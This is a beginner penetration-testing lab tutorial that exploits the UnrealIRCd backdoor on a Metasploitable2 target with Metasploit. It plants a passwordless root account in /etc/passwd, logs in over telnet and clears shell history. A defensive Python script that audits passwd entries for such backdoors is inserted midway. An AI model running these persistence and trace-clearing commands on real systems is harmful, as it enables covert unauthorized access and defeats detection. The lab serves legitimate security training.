Backdoor Creation and Clearing Traces After Attack

Beginner

Introduction

In this lab, we will learn how to create a backdoor and clear traces after successfully gaining access to a target machine through a penetration attack. The scenario is set up in the LabEx environment, where we will use the Kali terminal to exploit vulnerabilities on the Metasploitable2 target machine, gain root access, create a backdoor for future access, and clear any traces left behind during the attack process.

Gain Root Access on the Target Machine

In this step, we will use the UnrealIRCd 3.2.8.1 backdoor vulnerability to gain root access on the target machine.

Now you will start the attack machine (Kali Linux container) and the target machine (Metasploitable2 virtual machine) for the experiment.

  1. Open an xfce terminal on the LabEx host machine and start the Metasploitable2 target by running the following command:
sudo virsh start Metasploitable2
  2. Test the connectivity to the target machine by pinging it:
ping 192.168.122.102

Press Ctrl+C to stop the ping.

  3. Launch the Kali Linux container and enter the bash environment by running:
docker run -ti --network host b5b709a49cd5 bash
  4. Inside the Kali container, test the network connection to the target machine:
ping 192.168.122.102

Press Ctrl+C to stop the ping.

Now both the attack machine and the target machine are running, and you can start the penetration testing.

Note: If you accidentally exit the current bash, the Kali container will automatically stop. You can execute docker run -ti --network host b5b709a49cd5 bash again on the host to start a new Kali container and enter bash to continue the experiment.

  1. In the Kali Linux container, enter the following commands in the Kali Linux bash terminal:
service postgresql start
msfdb init
cd ~
msfconsole

This will start the PostgreSQL database service, initialize the database, and launch the Metasploit Framework Console (msfconsole) for further operations.

  2. Search for the UnrealIRCd vulnerability module:
search unreal_ircd
  3. Use the unix/irc/unreal_ircd_3281_backdoor module:
use exploit/unix/irc/unreal_ircd_3281_backdoor
  4. Set the target IP address:
set RHOST 192.168.122.102
  5. Exploit the vulnerability to gain access:
exploit
  6. Check the current user:
whoami

You should see that you have gained root access on the target machine.

Press Ctrl+D to quit the Metasploit console, then start the inspection.

Create a Backdoor

Now that we have gained root access, let's create a backdoor for future access to the target machine.

First of all, if you are not in the Metasploit console, you should start the Metasploit console:

cd ~
msfconsole

Then, check the system information:

uname -a

Find the root user's entry and its login shell:

cat /etc/passwd

Create a backdoor account with UID 0 (root privileges) and an empty password field:

echo 'shiyanlou1234::0:0::/:/bin/sh' >> /etc/passwd

Verify the backdoor account creation:

cat /etc/passwd

You should see the new account shiyanlou1234 in the output.

Open a new terminal and connect to the target machine using the backdoor account:

telnet 192.168.122.102

Enter the username shiyanlou1234 when prompted.

Check the current user:

whoami

You should see that you are logged in as the backdoor user.
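As an added, defender-side example that is not part of the lab, the following Python script parses /etc/passwd text and flags the indicators the backdoor line above leaves behind: a second UID 0 account, an empty password field, and an interactive shell whose home directory is /. The passwd sample is constructed for the example, not copied from a Metasploitable2 image.

```python
"""Audit /etc/passwd text for the kind of backdoor account this lab creates.

Each entry is checked for three indicators:
  - a UID 0 account whose name is not "root"
  - an empty password field (login succeeds without consulting /etc/shadow)
  - an interactive shell on an account whose home directory is "/"
"""
from dataclasses import dataclass

# Constructed sample: three ordinary entries followed by the lab's backdoor line.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
shiyanlou1234::0:0::/:/bin/sh
"""

NON_LOGIN_SHELLS = ("/usr/sbin/nologin", "/sbin/nologin", "/bin/false")


@dataclass
class Finding:
    user: str
    reason: str


def audit_passwd(text: str) -> list[Finding]:
    """Return one Finding per suspicious indicator found in passwd-format text."""
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append(Finding(fields[0], "malformed entry (expected 7 fields)"))
            continue
        name, pw, uid, _gid, _gecos, home, shell = fields
        if uid == "0" and name != "root":
            findings.append(Finding(name, "UID 0 account other than root"))
        if pw == "":
            findings.append(Finding(name, "empty password field (no password required)"))
        if home == "/" and shell not in NON_LOGIN_SHELLS:
            findings.append(Finding(name, "interactive shell with home directory /"))
    return findings


def suspicious_users(text: str) -> set[str]:
    """Distinct account names that produced at least one finding."""
    return {f.user for f in audit_passwd(text)}


if __name__ == "__main__":
    for f in audit_passwd(SAMPLE_PASSWD):
        print(f"{f.user}: {f.reason}")
```

Run it against a live host with `audit_passwd(open("/etc/passwd").read())`; a clean system returns an empty list.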

Press Ctrl+D to quit the Metasploit console, then start the inspection.

Clear Traces

After gaining access and creating a backdoor, it's important to clear any traces left behind during the attack process to avoid detection.

First of all, if you are not in the Metasploit console, you should start the Metasploit console:

cd ~
msfconsole

One common way to clear traces is to remove the command history. Bash keeps the current session's history in memory and writes it to the .bash_history file in the user's home directory when the session ends. Clear the in-memory history of the current shell with:

history -c

To clear the .bash_history file itself, first locate every copy on the system with the find command:

find / -name .bash_history

Press Ctrl+D to quit the Metasploit console, then start the inspection.

Summary

In this lab, we learned how to gain root access on a target machine using the UnrealIRCd backdoor vulnerability, create a backdoor account for future access, and clear traces left behind during the attack process. This practical experience will help you understand the techniques used by attackers to maintain persistent access and cover their tracks after a successful penetration attack.
